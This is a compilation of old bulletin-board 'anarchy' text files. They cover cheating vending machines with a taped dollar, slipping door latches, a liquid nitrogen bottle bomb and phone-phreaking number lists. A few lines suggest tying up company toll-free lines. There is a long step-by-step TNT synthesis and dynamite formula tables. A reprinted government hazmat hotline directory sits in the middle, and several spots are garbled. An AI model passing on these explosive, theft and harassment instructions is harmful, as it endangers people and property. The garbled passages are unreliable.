3/4 the width of the actual dollar.  It must be a good 6" or longer.
Next, you need some transparant tape.  Scotch magic tape will work
the best.  You simply tape the plastic strip to the dollar.  But, you
must be careful not to tape it more than 1/2" up the side of the dollar.
tape it on both sides (front and back, not top and bottom) of the dollar.
Now, all you have to do is use it:

Walk casually up to the secluded machine.  Take out your dollar, and put
it into the machine.  BE CAREFUL! Some of the more modern change machines
have alarms!  Most likely, though, drink or candy machines will not.  Now,
the machine starts taking your dollar.... You wait until your plastic
strip is almost all the way into the machine, and then you pull with
sufficient force to get the dollar out of the machine, but not rip it.  If
You did it correctly, you should have gotten whatever you bought, and still
have your dollar for later use.  On candy machines, though, make your
selection, and then wait and pull the dollar out.  Don't worry if you don't
get it on the first few tries.  It took me about 5 tries to master it.  It
DOES, i repeat DOES work for a fact if done correctly.  If you just can't
get it, though, either the machine is too sophisticated, or you put the
tape up too high on the dollar.  Have fun!!!!

                 a little annex to the cookbook from
                                                     d lsh


   ACID FLESH can be found  on local BBS's in Northern New Jersey

Lockpicking for the EXTREME beginner...           Brought to you by:
                                                        
                                                        -= Exodus =-


This is really a good method for opening doors that are locked.  The
only problem with this, though, is that it only works for outward
opening doors.  Ok, here we go....

1)  Realize you are not working with the actual lock, but that thing
    that sticks between the door and the wall.

2)  See how that thing is curved on one side?  Well, that is what we
    will be making use of.

3)  Acquire a large paper-clip.  If it is too short, it won't work.
    You have to also have a shoelace.  Now, onto the construction...

4)  Straighten the paper-clip.

5)  Loop one end of the paper clip around the shoelace.  The shoelace
    should be about 4/5 on one side of the clip and 1/5 on the other.
    Let's see if I can draw it.
                         
       ------------------*************************************
                        -*
                          *******


       --- is the paper clip
       *** is the shoelace

     That's not very good, but I hope you get the picture.

6)  All you have to do now is curve the paper clip (no, I won't draw it)

7)  With the curved paper-clip, stick it between the door and the wall,
    behind the metal thing that sticks between. 

8)  Feed it through with you hand, until you can grip both sides of the
    shoelace.

9)  Now, simply pull the lace and the door at the same time, and VIOLA!
    the door is open.

I prefer this over regular lock-picking if the door opens outward, because
it is a lot quicker.  Lock picking can take 5 minutes... When done correctly
this only takes 30 seconds!  So, if you can, use this.

          another addition to the mighty cookbook by
                        ACID FLESH




                            ANARCHY 'N' EXPLOSIVES
                            ==> PRELUDE VOLUME <==

   For you people that like blowing things up and shit like that, here's
 something that's not as dangerous or as difficult as more of the explosives
 available (or able to create)... It's called the LN2 Bomb (Short for Liquid
 Nitrogen Bomb). Very easy to make:

         Ingredients:     1 Plastic Two Litre Bottle
                            Enough Liquid Nitrogen To Fill The Bottle

         Instructions:    Fill the bottle with liquid nitrogen. Then cap
                          as tightly as possible. The vaporization of the
                          nitrogen will create enough pressure in the
                          bottle (within 5-15 minutes) to break it with
                          a quite strong explosive force... Very Easy...

                        USE AT YOUR OWN RISK....

                      _________________________
                      |800 #'s to phuck with- |
                      |Compiled by The Duelist|
                      |_______________________|
                     CALL JYER INC. xxx-xxx-xxxx
Numers with a ? either call forward to take u on some trip thru swithces,
but im sure if u fuck around with it enough u will get there tone somewhere.

Have fun....... Later!

800-
4261244 ?
6456561 VMS
2471753 ?
5244040 ?
6348026 ?
6677827 ?
8723425 ? (Extension dialer)
9928911 ? Modem
6242367 VMS (#)
4262468 ?
3389549 VMS
2220400 ?
5376001 ?
3439255 VMS (#)
8326979 ?
2339558 VMS
7299000 ?
5335545 ?
3332222 ?
3335555 VMS
3338888 ?



       =========== TOLL-FREE NUMBERS AND ON-LINE DATABASES ==========

            There are many toll-free assistance numbers  and  on-line
       databases  available  to federal,  state,  local,  and private
       sector personnel.  Some may be available through a federal  or
       state   agency,   while   others  are  publicly  available  on
       commercial systems or through private organizations.
            Except  for  their own, neither DOT nor FEMA endorses the
       following toll-free telephone numbers or on-line databases.

        1.  Federal and State Toll Free Technical Assistance Sources
        2.  Private Sector Toll Free Technical Assistance
        3.  Federal and State Agency Online Databases
        4.  Commercial and Private Online Databases

       =============================================================


******************************************************************************
           FEDERAL AND STATE TOLL FREE TECHNICAL ASSISTANCE  SOURCES
******************************************************************************

U.S. Coast Guard - National Response Center:  1-800-424-8802
                      in Washington, D.C. -  (202) 426-2675
                                             (202) 267-2675



                             EPA REGIONAL HOTLINES

EPA has now established a Hotline in each of it's regional offices  to  handle
Title  III  reporting.  Please  make note of the number for the office in your
area.

Nation-wide - (800) 535-0202

In Alaska and D.C. - (202) 479-2449

In the Regional Offices:

Region I - Boston, MA - (617) 565-3273
Region II - Edison, NJ - (201) 321-6765
Region III - Philadelphia, PA - (215) 597-1260
Region IV - Atlanta, GA - (404) 347-3222
Region V - Chicago, IL - (312) 886-6418
Region VI - Dallas, TX - (214) 655-7244
Region VII - Kansas City, KS - (913) 236-2806
Region VIII - Denver, CO - (303) 293-1730
Region IX - San Francisco, CA - (415) 974-7054
Region X - Seattle, WA - (206) 442-1270


**** Remember to  report  all  hazardous  materials  releases  to  your  Local
     Emergency  Planning  Committee representative and to your State Emergency
     Response Commission immediately!



                   TOXIC RELEASE INVENTORY REPORTING CENTER

EPA has established a reading room in the  Toxic  Inventory  Reporting  Center
(TRC) located at 470 L'Enfant Plaza East,  S.W.,  Suite 7103, Washington, D.C.
20024.  The reading room provides a place for  concerned  citizens  to  review
release  data  as  supplied  to  the  Environmental Protection Agency (through
section 313 reporting).  To date,  the center has received more than 50,000 of
the 300,000 release reports anticipated.

The TRC's is intended to serve as a central receipt point,  aid in the sorting
recording and storage of release data reported under Title  III.  Additionally
the  TRC  is to provide an easy method to facilitate public inquiries.  Anyone
can access the chemical information by logging onto a data  base  and  calling
the information up by using CAS number, state, city and/or facility name.

Staff from Computer Based Systems, Inc. (EPA contractor) are on-hand to assist
with  system inquiries between 8:00 am and 4:00 pm, Monday through Friday.  To
schedule an appointment, please call (202) 488-1501.



CHEMICAL EMERGENCY PREPAREDNESS PROGRAM (CEPP) - 1-(800) 535-0202
                                                 (202) 479-2449
Contact: Chemical Emergency Preparedness Program  (CEPP)
         Office of Solid Waste and Emergency Preparedness
         U.S. Environmental Protection Agency  (WH-548A)
         401  M  Street, SW
         Washington,  D.C.  20460


EMERGENCY MANAGEMENT INFORMATION CENTER (EMIC) - 1-800-638-1821
                                                 (301) 447-6771 ext 6032
Contact:  EMIC Librarian, Learning Resource Center

UNational Emergency Training Center
          16825 South Seton Avenue
          Emmitsburg,  Maryland  21727

     FEMA established EMIC (Emergency Management Information Center) to assist
     faculty,  staff,  students and off-campus users of the National Emergency
     Training   Center  Learning  Resource  Center  with  their  research  and
     information  needs.   EMIC  is  a  special  collection  of  natural   and
     technological  case  study  documents  that  can be requested for loan to
     state level fire  and  emergency  management  officials  by  applying  in
     writing,  on official letterhead,  to the EMIC librarian.  Other requests
     will be referred back to appropriate states for handling.



SUPERFUND AND RESOURCE CONSERVATION AND RECOVERY ACT - 1-800-424-9346
                                                       (202) 382-3000

Contact:  For Superfund -- Office of Emergency and Remedial Response
                           U.S. Environmental Protection Agency
                           401 M Street, S.W.
                           Washington, D.C.  20460

           For CERCLA -- Office of Waste Programs Enforcement
                         U.S. Environmental Protection Agency
                         401 M Street, S.W.
                         Washington, D.C.  20460

     EPA established the toll free technical assistance  hotline  in  1980  to
     answer  questions  and  provide documents to those needing information on
     the Superfund and Resource Conservation and Recovery Act.



TOXIC SUBSTANCES CONTROL ACT (TSCA) - (202)  554-1404

Contact:  Toxic Substances Control Act Assistance Office
          Office of Toxic Substances
          U.S. Environmental Protection Agency


******************************************************************************
             PRIVATE SECTOR TOLL FREE TECHNICAL ASSISTANCE SUPPORT
******************************************************************************


CHEMTREC: 1-(800) 424-9300.  Alaska, Hawaii and DC (202) 483-7616
Contact:  Chemical  Manufacturers  Association
          2501 M Street, N.W.
          Washington, D.C. 20037.

The Chemical Manufacturers Association  set  up  the  Chemical  Transportation
Emergency  Center  (CHEMTREC)  to provide immediate assistance to those at the
scene of accident,  24 hours a day,  seven days a week.  CHEMTREC maintains an
online  database on the chemical,  physical,  and toxicological properties and
health effects of the thousands of products of the member companies.  CHEMTREC
operates in two stages:  first,  staff provide chemical information for use in
onsite  decisionmaking involving handling the early stages of the problem and,
second,  notifies the manufacturer of the product of  the  accident  for  more
detailed  information  and  appropriate  follow-up.

CHEMNET  is  activated  by  a  call  to  CHEMTREC.  If a member shipper cannot
respond promptly to an incident and a chemical expert is required at  a  site,
then the shipper can authorize a CHEMNET-contracted emergency response company
to go in its place.



CHLOREP:  Emergency  contact through CHEMTREC above.
Contact:  Chlorine Institute
          342 Madison Avenue
          New York, NY 10017.

The  Chlorine  Institute  in  1972  established  its  Chlorine  Emergency Plan
(CHLOREP),  a  mutual-aid  response  network  of  chlorine  manufacturers  and
packagers,  to provide assistance at chlorine emergencies in the United States
and Canada  through  telephone  instructions  to  on-scene  personnel  or  the
dispatching  of  trained  teams  to sites.  Response is activated by a call to
CHEMTREC which in turn calls the designated CHLOREP contact,  who notifies the
appropriate   team  leader  based  upon  CHLOREP's  geographical  sector  team
assignments.



CAER:  Community Awareness and Emergency Response information line.
This is a 2 minute recorded  message  informing  callers  of  upcoming  events
related  to  coordinated  emergency  response  planning.  The CAER information
number is (202) 463-1599 and is updated twice a month.

To submit an event  to be publicized,  send the materials to:
                           Todd Miller
                           CMA Communications Dept.
                           2501 M Street, N.W.
                           Washington, D.C. 20037



The  Center  for  Fire  Research  in  the  National  Bureau  of  Standards has
established a public  access  computer  bulletin  board.
Contact:  Doug Walton
          System Operator

U(301) 975-6872

Information on the bulletin board includes:

     * a listing of the most recent reports from the Center for Fire Research;
     * information on upcoming activities at the Center for Fire Research such
         as conferences, seminars and workshops; and
     * information  on  FIREDOC,  the  Center's  fire  research  bibliographic
         system.


******************************************************************************

                   FEDERAL AND STATE AGENCY ONLINE DATABASES

******************************************************************************


The Office of Solid Waste and Emergency Response  (OSWER)  bulletin  board  is
intended  to  to  ts orr  communications and technology transfer among the Regions
and with Headquarters staff involved in solid or hazardous  waste  regulation,
permitting,   or   enforcement  and  with  ORD  scientists  and  engineers  in
Headquarters and laboratories who are supporting OSWER.  The OWSER is operated
under contract to the Office of  Program  Management  Technology  (OPMT).  The
OSWER BBS offers messages,  bulletins, files and computer programs, databases,
and conferences.  Bulletins include OSWER technical training opportunities and
ORD technology transfer seminars nationwide,  new ORD technical  publications,
the  top 25 compounds found at Superfund Sites,  and the current status of the
SITE  technology  demonstrations.   Conferences  include:  Executive (for  EPA
managers  only),   Ground-Water   Workstation,   Ground-Water  Monitoring  and
Remediation,   Risk  Management/Assessment,   and  Expert   Systems/Geographic
Information  Systems.   The  BBS  is  primarily  intended  for  EPA  Regional,
Headquarters,  and ORD personnel,  however,  OSWER welcomes  state  and  local
government  agencies and authorized EPA contractors.  The BBS telephone number
is (301) 589-8366, the voice line is (301) 589-8368.


The Hazardous Materials Information  Systems  (HMIS)  offers  two  menu-driven
programs to assist state, local and Federal agencies.  The U.S.  Department of
Transportation  (DOT),  Research  and Special Programs Administration's (RSPA)
project offers quick  access  to  both  exemptions  information  and  informal
interpretations.  The  exemptions  menu  provides  access  to  the  following:
exemption numbers, exemption holders, expiration dates, container type and DOT
specification,  hazardous material,  shipping name and class,  and regulations
affected.    The    interpretations   menu   provides   access   to   informal
interpretations  issued  by  the  Standards  Division,   Office  of  Hazardous
Materials   Transportation.   Each   search  provides:   requestor,   subject,
commodity,  container and regulations affected.  This service is provided FREE
to  state,  local,  and federal agencies.  Private sector organizations cannot
get an account on the HMIS but can call to receive  printouts  on  information
they  need  (there is a fee for the printout).  In order to gain access to the
HMIS you must FIRST ESTABLISH AN ACCOUNT by contacting:
                 Lessie Graves
                 Office  of Hazardous Materials Transportation
                 Information Services Unit
                 FTS/COMM: (202) 366-4555


Occupational  Safety   and   Health   Administration's   (OSHA)   Computerized
Information  System  (OCIS) is designed to aid OSHA,  State OSHA Program,  and
OSHA Area Office staff in responding to employers' and employees' occupational
safety and health problems by maintaining quick access to various computerized
information files.  OCIS files are maintained on a Digital Vax 11/750 computer
at the Salt Lake City Laboratory;  BASIS is the database management  software;
system  is accessed from OSHA and State Program offices only;  files are menu-
driven;  and new capabilities are under development.

Questions and comments can be directed to:
                          OCIS Help Desk
                          (801) 524-5366 or 524-5896
                           FTS  588-5366 or 588-5896



The National Library of Medicine's (NLM) Toxicology Data Network (TOXNET) is a
computerized  system  of  toxicologically  oriented  data  banks,  offering  a
sophisticated search and retrieval package which permits efficient  access  to
information on known chemicals and identifies unknown chemicals based on their
characteristics.  TOXNET files include: Hazardous Substances Data Bank (HSDB),
Toxicology  Data Bank (TDB),  and Chemical Carcinogenesis Research Information
System (CCRIS).

Regis orred NLM users can access TOXNET by direct dial or  through  TELENET  or
TYMNET  telecommunications  networks.  ations  verage  search  charges (per hour) are
$75.00 for prime time.

For detailed information on TOXNET  contact:
                    National Library of Medicine
                    Specialized Information Services
                    Biomedical Files Implementation Branch
                    8600 Rockville Pike
                    Bethesda, MD 20894
                    (301) 496-6531 or 496-1131

******************************************************************************
                    COMMERCIAL AND PRIVATE ONLINE DATABASES
******************************************************************************


FIREDOC:  ations  vailable From NBS
The Center for Fire Research in the National Bureau of Standards has made  its
computerized bibliographic system,  FIREDOC,  available for searching on-line.
The system can be accessed by telephone using a computer as a terminal.  About
7,000 items from the Center's collection are currently entered in the  FIREDOC
system.
For  further  information including instructions on access and use of FIREDOC,
contact:   Nora Jason
           Technical Information Specialist
           Center for Fire Research
           (301) 975-6862


CFRBBS is a public access computer bulletin board sponsored by: the Center for
Fire Research,  National Bureau of Standards,  US Department of  Commerce,  in
Gaithersburg, MD 20899.  It features computer programs developed by the Center
of  Fire  Research.  Contents of the board include:  fire simulation programs,
information on FIREDOC (the Center  for  Fire  Research  bibliographic  search
system;  FIREDOC users guide;  and FIREDOC compatible communications package),
information on upcoming activities at the Center  for  Fire  Research,  and  a
listing  of  the  most  recent  year's  reports  from the center.  There is no
connect fee for using the board;  however the user pays for  the  phone  call.
For more information contact Doug Walton, System Operator, at (301) 975-6872.


Public  Health Foundation's Public Health Network (PHN) users have full access
to all GTE Medical Information Network (MINET) services,  and can  communicate
directly  with  users  in PHN and other divisions of MINET.  Access to Surgeon
General, NLM/NIH,  CDC,  and American Medical Association information services
(e.g.,  Disease  Information,  Drug  Information,  Medical  Procedure  Coding,
Socioeconomic Bibliography, Expert Medical Physician Information Retrieval and
Education Service,  Massachusetts General Hospital  (MGH)  Continuing  Medical
Education,  and  AP  Medical News Service) are available ranging in price from
$21 to $39 an hour of connect time.

Subscription fee, payable on a one-time basis is $500.00, each additional user
is registered at $25.00,  and a User's Guide costs $15.00.  Connect time rates
range  from  $14  an hour peak to $7 an hour off-peak,  character transmission
charges are $.05 per 1,000 characters.

For detailed  information  on  PHN  or MINET contact:
                         The Public Health Foundation
                         1220 L Street, N.W.
                         Suite 350
                         Washington, D.C.  20005
                         (202) 898-5600



Information  Consultants,   Inc.'s  Chemical  Information  System  (ICIS)  and
Chemical  Information  System,  Inc.'s (Fein Marquart Associates) System (CIS)
are two competing companies which offer approximately 35 databases each,  some
similar,  others  different.  Databases  available for searching include,  for
example:   Oil  and  Hazardous  Materials  Technical  Assistance  Data  System
(OHMTADS)  with emphasis on environmental and safety data for spills response;
Chemical Evaluation  Search  and  Retrieval  (CEASARS)  gives  very  detailed,
evaluated  profiles  with  physical/chemical,  toxicological and environmental
information;  NIOSH Registry of Toxic Effects of Chemical  Substances  (RTECS)
with acute toxdata, TLV's, standards, aquatic tox, regulatory information, and
NTP  test  status;  Chemical Carcinogensis Research Information System (CCRIS)
giving  results  of  carcinogenicity,   mutagenicity,   tumor  promotion   and
carcinogenicity  tests under National Cancer Institute contract;  GENETOX with
genetic assay studies;  AQUIRE with aquatic toxicity information;  DERMAL with
dermal toxicity information.

Subscriber ($300 per year and $25-85  per  hour  of  connect  time)  and  non-
subscriber ($50-115 per hour connect time) options exist.

For detailed information contact:
     CIS,  Inc.                    or        Information Consultants, Inc.
     Fein Marquart Associates                1133 15th St., N.W.
     7215 York Road                          Washington, D.C.  20005
     Baltimore,  MD  21212                   (202) 822-5200
     (800) 247-8737


[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[]                                                                            []
[]                          List of Toll Free Numbers                         []
[]                                for amusement                               []
[]                                     and                                    []
[]                        for an outlet of frustration                        []
[]                                                                            []
[]                                                                            []
[]                            Uploaded and written by                         []
[]                                                                            []
[]                            Dr. |-| /-X |< |<  E  R                         []
[]                                                                            []
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
  You may ask  "Now why would I want to know some obsolete, unused, utterly
useless, toll free numbers"    Well, what you use this information for is up
to you, and if you want to use it for some thing like... well, like, forcing
that line to be busy for 2 straight days thus causing the company to lose money,
is completely up to you.
Magazines
=-=-=-=-=
Playgirl Advisor        (800) 854-2878  (except CA)
T.V. Guide              (800) 523-7933  (except PA)
Ladie's  Home Journal   (800) 327-8351  (except FA)
Sports Illustrated      (800) 621-8200  (except IL)
Book Digest Magazine    (800) 228-9700  (except Nebraska)
Money                   (800) 621-8200  (except IL)
Mail Order
=-=-=-=-=-
(bowling equip.)        (800) 323-1812  (except IL)
Edd the Florist, Inc.   (800) 247-1075  (except IA)
Golf Mail Order Co.     (800) 327-1760  (except FA)
Inflate-a-bed           (800) 835-2246  (except KS)
International Male      (800) 854-2795  (except CA)
Porta Yoga (c.c. orders)(800) 327-8912  (except FA)
Unique Products Co.     (800) 228-2049  (except Nebraska)
Ski Resorts
=-=-=-=-=-=HN) Concord             (800) 431-2217  (only New England States)
Mt. Snow                (800) 451-4211  (Eas orrn Seabord)
Ski Us at Franconia     (800) 258-0366  (Eastern Seabord)
Stevensville            (800) 431-2211  (New England States)
Mannequins
=-=-=-=-=-
Dann-Dee                (800) 621-3904  (except IL)
Car Rentals
=-=-=-=-=-=
A-Aaron, Inc.           (800) 327-7513  (except FA)
Airlines Rent-A/Car     (800) 228-9650  (FA only)
Dollar-A-Day            (800) 421-6868  (except FA)
Hertz                   (800) 261-1311  (Canada only)
Sears Rent-A-Car        (800) 228-2800  (except Nebraska)
Thrifty Rent-A-Car      (800) 331-4200  (except Oklahoma)
Newspapers
=-=-=-=-=-
Globe Gazette           (800) 392-6622  (IA only)
Oil Daily               (800) 223-6635  (except NY)
Christian Science Motor (800) 225-7090  (except MS)
Wall Street Journal     (800) 257-0300  (except NJ)
The National Observer   (800) 325-5990  (except MO)
Have fun.


                                                  -= Exodus =-                            ANARCHY 'N' EXPLOSIVES
                            =====> VOLUME 2 <=====

    This volume defines a few varieties of misc explosives, charges, and
       whatever I had in mind at that time. Anyway, these formulas are not
       as precise in measurements for they were given in brief summary.
       However, they will work, and if used correctly can be safe and "fun".

    FRENCH AMMONAL:
-------------------
            Type: Low Explosive
     Ingredients: 86% Ammonium Nitrate
                   6% Stearic Acid
                   8% Aluminum Powder
     Description: French ammonal is an easily improvised low explosive
                  mixture. It is generally less effective than an equal
                  weight of TNT. The material is loaded by pressing it into
                  a suitable container. Initiation by an Engineer's special
                  blasting cap is recommended.
        Comments: This material was tested. It is effective.
      References: TM 31-201-1, Unconventional Warfare Devices and Techniques,
                  para 1401.

    TETRYTOL:
-------------
            Type: High Explosive
     Ingredients: 75% Tetryl
                  25% TNT
     Description: Tetryol is a high explosive bursting charge. It is used as
                  a demolition explosive, a bursting charge for mines, and
                  in artillery shells. The explosive force of tetrytol is
                  approximately the same as that of TNT. It may be initiated
                  by a blasting cap. Tetrytol is usually loaded by casting.
        Comments: This material was tested. It is effective.
      References: TM 9-1900, Ammunition, General, page 55.
                  TM 9-1910, Military Explosives, page 188.

    IMPROVISED PLASTIC EXPLOSIVE FILLER:
----------------------------------------
            Type: High Explosive
     Ingredients: Finely Powdered Potassium Chlorate Cdata  bstals
                  Petroleum Jelly        **MIX THOUROUGHLY**
     Description: This plastic explosive filler can be detonated with a
                  No. 8 commercial blasting cap or with any military
                  blasting cap. The explosive must be stored in a waterproof
                  container until ready to use.
        Comments: This material was tested. It is effective.
      References: TM 31-210, Improvised Munitions, sec I, No. 1.

    FLAMABILITY OF GASES:
-------------------------
            Type: Gas Explosive
     Ingredients: Explosive Gas
     Description: Under some conditions, common gases act as fuel. When mixed
                  with air, they will burn rapidly or even explode. For some
                  fuel-air mixtures, the range over which the explosion can
                  occur is quite wide while for others the limits are narrow.
                  The upper and lower amounts of common fuels that will cause
                  an ignitable mixture are shown in the table below. The
                  quantity shown is the percentage by volume of air. If the
                  fuel-air mixture is too lean or too rich, it will not
                  ignite. The amounts shown are therefore called limits of
                  inflamability.
                                                   Gases (% by volume of air)
                  Fuel (Gas)                       Lower Limit    Upper Limit
                  -------------------------------  -----------    -----------
                  Water Gas Or Blue Gas                7.0             72
                  Natural Gas                          4.7             15
                  Hydrogen                             4.0             75
                  Acetylene                            2.5             81
                  Propane                              2.2             10
                  Butane                               1.9              9

        Comments: These fuels have been tested under labratory conditions.
                  They are effective. Ignition depends on method of
                  initiation, uniformity of mixture, and physical conditions.
      References: Bulletin 29, Limits of Inflammability of Gases and Vapors
                  H.F. Coward and G.W. Jones, Bureau of Mines, U.S.
                  Government Printing Offece, 1939.

                                 !!!WARNING!!!
 ! USE THESE FORMULAS AND OTHER FORMS OF ANARCHY/EXPLOSIVES AT YOUR OWN RISK !

More volumes of ANARCHY soon to come.......



===> DOCTOR DISSECTOR



---------------------------------------

                            ANARCHY 'N' EXPLOSIVES
                            =====> VOLUME 3 <=====

  This is the MOST important or one of the most important volumes regarding
the various mixtures of anarchy that I will be "publishing" to the "public".
Also, it may as well be the MOST DANGEROUS to prepare, the substance we will
be dealing with is Trinitrotoluene, or short - TNT. This high expolosive
is a VERY DANGEROUS, slightly unstable substance. The crystalized crude TNT
is about the color of brown sugar and feels greasy to the touch. It is
suitable for many uses as a high-explosive, but not for the use in high-
explosive shells. It is also highly reactive to many other chemical
substances. It can be incorporated into dynamite and many other explosives
that will be explained in further detail later, in other volumes of ANARCHY.

                                   WARNING:
  DO NOT ATTEMPT TO FINISH THIS PROJECT UNLESS YOU ARE FULLY CAPABLE SAFELY
  EXECUTING THE PROCESSES IN A SAFE ENVIRONMENT! IF YOU CHOOSE TO CONTINUE,
    READ THE INSTRUCTIONS COMPLETELY THROUGH BEFORE BEGINNING AND HAVE ALL
  MATERIALS AND TOOLS (INCLUDING SAFETY/EMERGENCY EQUIPTMENT) READY FOR USE
  WHEN OR IF THEY ARE NEEDED. THIS IS NOT A JOKE! USE AT YOUR OWN RISK!!!!!

  Preparation of Trinitrotoluene (Three Stages). A mixture of 294 grams
    of concentrated sulfuric acid (density 1.84) and 147 grams of nitric
    acid (density 1.42) is added slowly from a dropping funnel to 100
    grams of toluene in a tall 600-cc. beaker, while the liquid is stirred
    vigorously with an electric stirrer and it's temperature is maintained
    at 30 to 40 degrees celsius by running cold water in the vessel in
    which the beaker is standing. The addition of acid will require from an
    hour to an hour and a half. The stirring is then continued for half an
    hour longer without cooling; the mixture is allowed to stand over night
    in a separatory funnel; the lower layer of spent acid is drawn off; and
    the crude mononitrotoluene is weighed. One-half of it, corresponding to
    50 grams of toluene, is taken for the dinitration.
      The mononitrotoluene (MNT) is dissolved in 109 grams of concentrated
    sulfuric acid (d. 1.84) while the mixture is cooled in running water.
    The solution in a tall beaker is warmed to 50 degrees
  and a mixed acid,
    composed of 54.5 grams each of nitric acid (d. 1.50) and sulfuric acid
    (d. 1.84), is added slowly drop by drop from a dropping funnel while
    the mixture is stirred mechanically. The heat generated by the reaction
    raises the temperature, and the rate of addition of the acid is regulated
    so that the temperature of the mixture lies always between 90 degrees
    and 100 degrees. The addition of the acid will require about 1 hour.
    After the acid has been added, the mixture is stirred for 2 hours longer
    at 90-100 degrees to complete the nitration. Two layers seperate on
    standing. The upper layer consists largely of dinitrotoluene (DNT), but
    probobly contains a certain amount of TNT. The trinitration in the
    laboratory is converniently carried out without separating the DNT from
    the spent acid.

      While the dinitration mixture is stirred actively at a temperature of
    about 90 degrees, 145 grams of fuming sulfuric aced (oleum containing
    15% free SO3) is added slowly by pouring from a beaker. A mixed acid,
    composed of 72.5 grams each of nitric acid (d. 1.50) and the 15% oleum,
    is now added drop by drop with good agitation while the heat of the
    reaction maintains the temperature at 100-115 degrees. After about
    three-quarters of the acid has been added, it will be found necessary
    to apply external heat to maintain the temperature. After all the acid
    has been added (taking 1 1/2 to 2 hours), the heating and stirring are
    continued for 2 hours longer at 100-115 degrees. After the material has
    stood overnight, the upper TNT layer will be found to have solidified
    to a hard cake, and the lower layer of spent acid to be filled with
    cdata  bstals. The acid is filtered through a Buchner funnel (without filter
    paper), and the cake is broken up and washed with water on the same
    filter to remove excess of acid. The spent acid contains considerable
    amounts of TNT in solution; this is precipitated by pouring the acid
    into a large volume of water, filtered off, rinsed with water, and added
    to the main batch. All the of the product is washed three or four times
    by agitating it vigorously with hot water under which it is melted.
    After the last washing, the TNT is  granulated by allowing it to cool
    slowly under hot water while the stirring is continued. The product,
    filtered off and dried at ordinary room temperature, is equal to a good
    commercial sample of crude TNT. It may be purified by dissolving in warm
    alcohol at 60 degrees and allowing to cool slowly, or it may be purified
    by digesting with 5 times its weight of 5% sodium hydrogen sulfite
    solution at 90 degrees for half an hour with vigorous stirring, washing
    with hot water until the washings are colorless, and finally granulating
    as before. The product of this last treatment is equal to a good
    commercial sample of purified TNT. Pure ALPHA-TNT, melting point 80.8
    degrees, may be procured by recrystallizing this material once from
    nitric acid (d. 1.42) and once from alcohol.

                 Well, that's it... AND REMEMBER MY WARNING!

future editions of ANARCHY 'N' EXPLOSIVES comming soon.....
                                    (whenever I have time to type them up!)



by Doctor Dissector of course!



---------------------------------------

                            ANARCHY 'N' EXPLOSIVES
                            =====> VOLUME 4 4 <=====

   In this particular volume, we will be discussing types of Dynamite,
these high-explosives being one of the more important or destructive of the
anarchist's formulas. Note that some of these mixtures are very unstable or
shock ignited, and that care should be observed when handling these unstable
mixtures. Some of these formulae deal with Trinitrotoluene (TNT) and the
preparation for that is given under the volume 3, within this series.

                                   WARNING:
THESE ARE REAL EXPLOSIVES AND MAY CAUSE SERIOUS INJURY OR DEATH UPON MISUSE.
  DO NOT ATTEMPT TO PREPARE ANY AS SAMPLE IF YOU ARE NOT FULLY CAPABLE OF
UNDERSTANDING THE DANGERS AND PRECAUTIONS OF THESE PRODUCTS. THESE FORMULAE
   ARE THE TRUE FORMULAE TO CREATE THESE MIXTURES AND ARE THEREFORE VERY
                      DANGEROUS. USE AT YOUR OWN RISK!!!

Guhr Dynamite:
  Ingredients-  1 part Kieselguhr
                3 parts Nitroglycerin

  Description- This dynamite is primarily used in blasting. It is fairly
               stable, in the drop test, it exploded by the fall of a 1 kg
               weight through 12 to 15 cm., or by the fall of a 2 kg weight
               through 7 cm. The frozen material is less sensitive: a drop of
               more than 20 cm. with a 1 kg weight is needed to explode it,
               and the 2 kg weight is necessary to explode it. Frozen or
               unfrozen, it can be detonated by shooting at it with a
               military rifle, when held in a paper cartridge. Generally,
               it is detonated with a steel-on-steel blow. Velicity of
               detonation vary from 6650 to 6800 meters per second at a
               density loading of 1.50.

Extra-Dynamite:
  Ingredients-      FORMULA 1                   FORMULA 2
                71% Nitroglycerin           62% Ammonium Nitrate
                23% Amonium Nitrate         25% Nitroglycerin
                 4% Collodion               12% Charcoal
                 ed to e% Charcoal                 1% Collodion

  Description- This material is crumbly and plastic between the fingers.
               This material can be detonated with any detonating cap.

Table Of Dynamite Formulae:
       INGREDIENT                             STRENGTH
                          15%  20%  25%  30%  35%  40%  45%  50%  55%  60%
 Nitroglycerin..........  15   20   25   30   35   40   45   50   55   60
 Combustible Material...  20   19   18   17   16   15   14   14   15   16
 Sodium Nitrate.........  64   60   56   52   48   44   40   35   29   23
 Calcium or Magnesium
    Carbonate...........   1    1    1    1    1    1    1    1    1    1
                            **********AMOUNTS GIVEN IN PERCENTAGES*******

Table Of More Dynamite Formulae:
                                         STRENGTH
       INGREDIENT             ORDINARY             LOW FREEZING
                         30% 35% 40% 50% 60%    30% 35% 40% 50% 60%
Nitroglycerin..........  15  20  22  27  35     13  17  17  21  27
Nitrosubstitution
    Compounds..........   0   0   0   0   0      3   4   4   5   6
Ammonium Nitrate.......  15  15  20  25  30     15  15  20  25  30
Sodium Nitrate.........  51  48  42  36  24     53  49  45  36  27
Combustible Material...  18  16  15  11  10     15  14  13  12   9
Calcium Carbonate or
    Zinc Oxide.........   1   1   1   1   1      1   1   1   1   1
                           *****AMOUNTS GIVEN IN PERCENTAGES*****

Master Table Of Dynamites:
       INGREDIENT                               FORMULA
                             1   2   3   4   5   6   7   8   9  10  11  12
Ammonium Nitrate..........  52  53  60  61  66  73  78  83   0   0   0   0
Potassium Nitrate.........  21   0   0   0   0  2.8  5   7 30.5 34   0   0
Sodium Nitrate............   0  12   5   3   0   0   0   0   0   0 30.5 24.5
Barium Nitrate............   0   0   0   0   0   0   0   2   4   1   0   0
Na or K Chloride..........   0   0  21 20.5 22  15   8   0   0   0   0   0
Hydrated Ammonium Oxalate.  16  19   0   0   0   0   0   0   0   0   0   0
Ammonium Chloride.........   6   0   0   0   0   0   0   0   0   0   0   0
Cereal or Wood Meal.......   0   4   4  7.5  2   1   5   2   0 38.5 39.5 40.5
Glycerin..................   0   0   0   4   0   0   0   0   0   0   0   0
Spent Tan Bark Meal.......   0   0   0   0   0   0   0   0  40   1   0   0
Potassium Dichromate......   0   0   0   0   0   0   0   0   0   0   5   5
Sodium Carbonate..........   0   0   0   0   0   0   0   0  .5  .5   0   0
Powdered Coal.............   0   0   0   0   4   0   0   0   0   0   0   0
Nitrotoluene..............   0   0   6   1   0   0   0   0   0   0   0   0
Dinitrotoluene............   0   0   0   0   0   5   0   0   0   0   0   0
Trinitrotoluene...........   0   6   0   0   0   0   0   2   0   0   0   0
